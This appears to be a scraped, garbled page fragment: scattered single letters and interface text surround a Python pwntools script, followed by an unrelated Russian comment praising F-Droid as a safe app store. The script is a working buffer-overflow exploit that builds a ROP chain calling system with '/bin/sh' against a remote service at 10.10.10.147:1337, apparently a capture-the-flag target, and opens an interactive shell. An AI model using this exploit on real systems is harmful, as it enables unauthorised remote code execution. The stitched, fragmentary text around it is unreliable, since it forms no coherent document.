T
Size: a a a
T
N
R
T
A
T
A
T
SI
T
SI
#!/usr/bin/env python
from pwn import *
context.log_level = 'INFO'
context.terminal = ['tmux', 'sp', '-h']
context.timeout = 2
ovflw_offset = 120
pop_rdi_ret = 0x000000000040120b
bin_sh = '//bin/sh\x00'
e = ELF("./myapp")
#p = process(e.path)
p = remote("10.10.10.147", 1337)
buf = ''
buf += cyclic(ovflw_offset-len(bin_sh))
buf += bin_sh
buf += p64(0x0000000000401206) # r13, r14, r15, ret
buf += p64(e.symbols['system'])
buf += p64(0x41414141)
buf += p64(0x42424242)
buf += p64(e.symbols['test'])
buf += '\x00'
p.writeline(buf)
p.interactive()
SI
SI
b
b
T
b
IV
IV
F-Droid
очень хорошая замена плэй маркету, плюс она требует с каждого разработчика приложения исходный код самого приложения, в общем безопасный)